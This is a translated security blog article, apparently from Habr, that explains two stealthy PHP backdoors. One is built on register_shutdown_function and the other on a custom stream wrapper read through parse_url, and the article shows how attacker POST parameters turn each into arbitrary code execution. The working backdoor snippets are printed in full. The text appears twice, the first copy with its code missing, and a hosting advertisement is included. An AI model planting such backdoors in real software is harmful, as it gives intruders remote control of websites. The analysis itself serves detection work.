Recognize and neutralize. Search for unorthodox backdoors
According to our calculations, in 72% of the infected sites, hidden back-end administration programs are used - backdoors. With their help, fraudsters get remote access to your site, and of course, this threatens the owner: receiving and transmitting confidential user data, launching malicious programs, destroying information, and so on.
From time to time, one encounters unique backdoors that do not include the usual PHP functions, such as eval, create_function, preg_replace, assert, base64_decode, etc.
Such backdoors often look like source code without any obfuscation, no encrypted strings, string concatenation, formatting the program code, or changing its structure. However, these backdoors still allow an attacker to run arbitrary code on your server.
')
Let's start with the simple. The comment in the file says that this is @package win.error.Libraries with the function:
In this case, we consider $ _POST as something suspicious. But is this really malicious code?
register_shutdown_function registers a function that will be executed upon completion of the script. Therefore, regardless of the code that you see in the script, after its completion, the callback function from the register_shutdown_function function will be executed.
The function executed after the script will look like this:
In any case, the code looks mysterious. Let's look at it through the eyes of a hacker and assume that they have activated a script with the following POST parameters:
d = create_function
e = base64_decode
c = some_base64_encoded_malicious_PHP_code
We get the following:
Now it looks like a regular backdoor. This code does not require an additional call, since register_shutdown_function registers a callback function, which will be automatically executed after the script has completed.
Now let's complicate the task of recognizing backdoors.
Before us is a comment - @package Stream.ksn.Libraries, which means that the file contains the Stream class and a function for working with stream_wrapper_register, which registers the wrapper using the ksn protocol.
And now, in order. For site owners and some webmasters, this code looks legitimate - typical files in content management systems or third-party plug-ins - perhaps it’s not quite clear what he does and what he does, but if he does, he probably needs it and is useful. Does anyone know what ksn streams are?
But hey - we see that in the code there are POST-data. But this is already suspicious, since the POST parameters can be controlled by intruders. It is not entirely clear what POST data is used in this code. Let's play cryptographers and use decoding technique, replace letters in the phrase.
Let's start with this part of the code from the stream_open function:
Suspiciously when the POST parameter is used as the function name. The code assumes that the value of $ _POST ['d'] can be create_function. If so, then $ url ["host"] contains some executable code, but the $ url variable parses the URL and returns its components using the standard PHP parse_url function. This means that $ url ["host"] is only part of the host portion of the URL path.
I doubt that the domain name may contain executable PHP code ... right?
Let's check out where we get the $ path parameter in function stream_open: in theory, it will contain the parsed URL obtained using the parse_url function. To find out, consider this part of the code:
The stream_wrapper_register function registers the ksn protocol and the Stream class that will work with this protocol. The Stream class follows the condition of the streamWrapper prototype, namely streamWrapper :: stream_open - opens the file or URL, and will be called immediately after the protocol initialization.
stream_open should follow the description, where $ path is the URL passed to fopen (), which assigns the named resource specified in the filename argument to the stream:
In our case, fopen opens the URL ksn: //:
As a result, $ path is the string: 'ksn: //'.$_POST [' f '] ($ _POST [' c ']),'
This will create a URL in which the host part is the malicious PHP code being executed.
Is it possible to create a domain name or IP address, which will actually be a full-fledged PHP code for website attack? The parse_url function does not check URLs for correctness, but simply breaks them apart. Everything from: // to the first slash (/) or colon (:) is considered the main part of the URL.
For example, if you specify the parse_url function: ksn: // eval (base64_decode ($ _POST ["code"])); The main part of the URL will be returned: eval (base64_decode ($ _ POST ["code"]));
Following the logic of the backdoor, we get the following POST parameters:
e = base64_decode
c = some_base64_encoded_malicious_PHP_code
In this case, the wording fopen looks like this:
Now, back to the stream_open function, this will be the last piece of the puzzle. Now we know which URL can be passed to the fopen function file:
And the pants turn, the pants turn into an elegant line:
The next line just executes the backdoor code:
In other words, all that is required to execute the backdoor code is to call the fopen () function with the generated ksn: // URL.
The above was an example of how attackers could use the less well-known PHP functions to create vulnerabilities. Considering that there are thousands of PHP files on a typical web site, you can hardly check each file carefully. Because the search for malware on the site - the task is not entirely simple. You can’t rely only on manual code checking and simple scripts that scan known malware patterns.
As advertising. Stock! Only now get up to 4 months of free use of VPS (KVM) with dedicated drives in the Netherlands and the USA (configurations from VPS (KVM) - E5-2650v4 (6 Cores) / 10GB DDR4 / 240GB SSD or 4TB HDD / 1Gbps 10TB - $ 29 / month and above, options with RAID1 and RAID10 are available) , a full-fledged analogue of dedicated servers, when ordering for a period of 1-12 months, the conditions of the promotion are here, existing subscribers can receive a 2-month bonus!
How to build the infrastructure of the building. class c using servers Dell R730xd E5-2650 v4 worth 9000 euros for a penny?
From time to time, one encounters unique backdoors that do not include the usual PHP functions, such as eval, create_function, preg_replace, assert, base64_decode, etc.
Such backdoors often look like source code without any obfuscation, no encrypted strings, string concatenation, formatting the program code, or changing its structure. However, these backdoors still allow an attacker to run arbitrary code on your server.
')
Backdoor and Shutdown Function
Let's start with the simple. The comment in the file says that this is @package win.error.Libraries with the function:
function win() { register_shutdown_function($_POST['d']('', $_POST['f']($_POST['c']))); } In this case, we consider $ _POST as something suspicious. But is this really malicious code?
register_shutdown_function registers a function that will be executed upon completion of the script. Therefore, regardless of the code that you see in the script, after its completion, the callback function from the register_shutdown_function function will be executed.
The function executed after the script will look like this:
$_POST['d']('', $_POST['f']($_POST['c'])) In any case, the code looks mysterious. Let's look at it through the eyes of a hacker and assume that they have activated a script with the following POST parameters:
d = create_function
e = base64_decode
c = some_base64_encoded_malicious_PHP_code
We get the following:
create_function('', base64_decode(some_base64_encoded_malicious_PHP_code)) Now it looks like a regular backdoor. This code does not require an additional call, since register_shutdown_function registers a callback function, which will be automatically executed after the script has completed.
Backdoor and Stream Wrapper
Now let's complicate the task of recognizing backdoors.
Before us is a comment - @package Stream.ksn.Libraries, which means that the file contains the Stream class and a function for working with stream_wrapper_register, which registers the wrapper using the ksn protocol.
class Stream { function stream_open($path, $mode, $options, &$opened_path) { $url = parse_url($path); $f = $_POST['d']('', $url["host"]); $f(); return true; } } stream_wrapper_register("ksn", "Stream"); // Register connect the library Stream $fp = fopen('ksn://'.$_POST['f']($_POST['c']), ''); And now, in order. For site owners and some webmasters, this code looks legitimate - typical files in content management systems or third-party plug-ins - perhaps it’s not quite clear what he does and what he does, but if he does, he probably needs it and is useful. Does anyone know what ksn streams are?
But hey - we see that in the code there are POST-data. But this is already suspicious, since the POST parameters can be controlled by intruders. It is not entirely clear what POST data is used in this code. Let's play cryptographers and use decoding technique, replace letters in the phrase.
Let's start with this part of the code from the stream_open function:
$f = $_POST['d']('', $url["host"]); Suspiciously when the POST parameter is used as the function name. The code assumes that the value of $ _POST ['d'] can be create_function. If so, then $ url ["host"] contains some executable code, but the $ url variable parses the URL and returns its components using the standard PHP parse_url function. This means that $ url ["host"] is only part of the host portion of the URL path.
I doubt that the domain name may contain executable PHP code ... right?
Let's check out where we get the $ path parameter in function stream_open: in theory, it will contain the parsed URL obtained using the parse_url function. To find out, consider this part of the code:
stream_wrapper_register("ksn", "Stream"); The stream_wrapper_register function registers the ksn protocol and the Stream class that will work with this protocol. The Stream class follows the condition of the streamWrapper prototype, namely streamWrapper :: stream_open - opens the file or URL, and will be called immediately after the protocol initialization.
stream_open should follow the description, where $ path is the URL passed to fopen (), which assigns the named resource specified in the filename argument to the stream:
public bool streamWrapper::stream_open ( string $path , string $mode , int $options , string &$opened_path ) In our case, fopen opens the URL ksn: //:
$fp = fopen('ksn://'.$_POST['f']($_POST['c']), ''); As a result, $ path is the string: 'ksn: //'.$_POST [' f '] ($ _POST [' c ']),'
This will create a URL in which the host part is the malicious PHP code being executed.
Is it possible to create a domain name or IP address, which will actually be a full-fledged PHP code for website attack? The parse_url function does not check URLs for correctness, but simply breaks them apart. Everything from: // to the first slash (/) or colon (:) is considered the main part of the URL.
For example, if you specify the parse_url function: ksn: // eval (base64_decode ($ _POST ["code"])); The main part of the URL will be returned: eval (base64_decode ($ _ POST ["code"]));
Following the logic of the backdoor, we get the following POST parameters:
e = base64_decode
c = some_base64_encoded_malicious_PHP_code
In this case, the wording fopen looks like this:
$fp = fopen('ksn://base64_decode(base64_encoded_malicious_PHP_code)', ''); Now, back to the stream_open function, this will be the last piece of the puzzle. Now we know which URL can be passed to the fopen function file:
$f = $_POST['d']('', $url["host"]); And the pants turn, the pants turn into an elegant line:
$f = create_function('', base64_decode(base64_encoded_malicious_PHP_code)); The next line just executes the backdoor code:
$f(); In other words, all that is required to execute the backdoor code is to call the fopen () function with the generated ksn: // URL.
The above was an example of how attackers could use the less well-known PHP functions to create vulnerabilities. Considering that there are thousands of PHP files on a typical web site, you can hardly check each file carefully. Because the search for malware on the site - the task is not entirely simple. You can’t rely only on manual code checking and simple scripts that scan known malware patterns.
As advertising. Stock! Only now get up to 4 months of free use of VPS (KVM) with dedicated drives in the Netherlands and the USA (configurations from VPS (KVM) - E5-2650v4 (6 Cores) / 10GB DDR4 / 240GB SSD or 4TB HDD / 1Gbps 10TB - $ 29 / month and above, options with RAID1 and RAID10 are available) , a full-fledged analogue of dedicated servers, when ordering for a period of 1-12 months, the conditions of the promotion are here, existing subscribers can receive a 2-month bonus!
How to build the infrastructure of the building. class c using servers Dell R730xd E5-2650 v4 worth 9000 euros for a penny?
Source: https://habr.com/ru/post/335392/
All Articles